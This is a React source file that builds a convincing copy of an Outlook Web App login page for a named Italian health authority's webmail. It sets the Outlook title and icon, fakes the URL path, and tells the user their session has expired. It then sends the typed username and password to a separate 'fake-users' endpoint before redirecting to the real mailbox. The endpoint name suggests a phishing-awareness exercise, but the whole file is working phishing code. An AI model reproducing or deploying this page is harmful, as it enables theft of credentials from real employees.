import React, {useCallback, useEffect} from 'react';
import logo from './download.png';
import logo_testo from './logo_outlook.png';
import sign_in from './accedi.png';
import axios from "axios";


const TestLayout1 = () => {

	useEffect(() => {
		document.title = 'Outlook Web App';
		let link = document.querySelector("link[rel~='icon']");
		if (!link) {
			link = document.createElement('link');
			link.rel = 'icon';
			document.getElementsByTagName('head')[0].appendChild(link);
		}
		link.href = 'https://findicons.com/files/icons/2795/office_2013_hd/256/outlook.png';
		window.history.pushState({}, '', '/owa/#path=/mail');
	}, [])

	const onSubmit = useCallback(() => {
		let inputValue = document.getElementById('username').value;
		let passwordValue = document.getElementById('password').value;

		console.log(inputValue, passwordValue);

		axios
			.post('https://ocean.aslcittaditorino.it/mongo-api/fake-users', {
				username: inputValue,
				password: passwordValue,
				date: new Date().toLocaleDateString(),
				time: new Date().toLocaleTimeString()
			})
			.then(res => {
				console.log(res);
			})
			.catch(err => console.log(err))
			.finally(() => window.open('https://posta.aslcittaditorino.it/owa/#path=/mail', '_self'))

	}, [])

	return (
		<React.Fragment>

			<form style={{height: "100%", width: "100%", margin: 0}}>
				<input type="hidden" name="destination" value="https://posta.aslcittaditorino.it/owa"/>
				<input type="hidden" name="flags" value="4"/>
				<input type="hidden" name="forcedownlevel" value="0"/>

				<div style={{
					minWidth: "650px",
					minHeight: "650px",
					display: 'grid',
					gridTemplateColumns: '332px 1fr'
				}}>

					{/*SIDEBAR*/}
					<div style={{
						backgroundColor: "#0072C6",
						width: 332,
						height: "100vh",
						display: "flex"
					}}>
						<div style={{
							margin: "213px auto auto 109px"
						}}>
							<img
								src={logo}
								alt={"logo"}
								className="owaLogo" aria-hidden="true"/>
						</div>
					</div>

					{/*FORM*/}
					<div style={{
						paddingTop: 174,
						paddingLeft: 132,
						paddingRight: 142,
						backgroundColor: '#f7f7f7',
						display: "flex",
						justifyContent: "center"
					}}>

						<div style={{
							height: 263,
							width: 423
						}}>

							<img src={logo_testo} alt={'logo_testo'} style={{
								marginBottom: 22
							}}/>

							<div style={{
								fontSize: 12,
								color: '#666666',
								fontFamily: '\'Segoe UI\', \'Segoe WP\', \'Segoe UI WPC\', Tahoma, Arial, sans-serif'
							}}>User name:
							</div>
							<input autoComplete={'honorific-suffix'} id="username" style={{
								border: '1px solid #98A3A6',
								height: " 22px",
								fontSize: " 12px",
								padding: " 3px 5px",
								color: " #333333",
								fontFamily: " 'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif",
								marginBottom: " 20px",
								width: 250
							}}/>

							<div style={{
								fontSize: 12,
								color: '#666666',
								fontFamily: '\'Segoe UI\', \'Segoe WP\', \'Segoe UI WPC\', Tahoma, Arial, sans-serif'
							}}>Password:
							</div>
							<input autoComplete={'honorific-suffix'} id="password" type='password'
							       style={{
								       border: '1px solid #98A3A6',
								       height: " 22px",
								       fontSize: " 12px",
								       padding: " 3px 5px",
								       color: " #333333",
								       fontFamily: " 'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif",
								       marginBottom: " 20px",
								       width: 250
							       }}/>

							<div style={{
								fontFamily: " 'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif",
								color: "#999999",
								fontSize: 12,
								marginTop: 5
							}}>
								Your session has expired. To protect your account from unauthorized access, always close the connection
								to your mailbox after a period of inactivity. You need to re-enter your username and password.
							</div>

							{/*SIGNIN*/}
							<div
								onClick={onSubmit}
								style={{
									fontSize: 22,
									color: '#0072C6',
									fontFamily: " 'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif",
									marginTop: 20,
									display: "flex",
									flexDirection: "row",
									alignItems: "end",
									cursor: "pointer"
								}}>
								<img src={sign_in} alt={'signin'} style={{paddingBottom: 2}}/>
								<span style={{
									paddingLeft: 11, paddingRight: 11
								}}>sign in</span>
							</div>

						</div>
					</div>
				</div>
			</form>

		</React.Fragment>
	);
}

export default React.memo(TestLayout1);
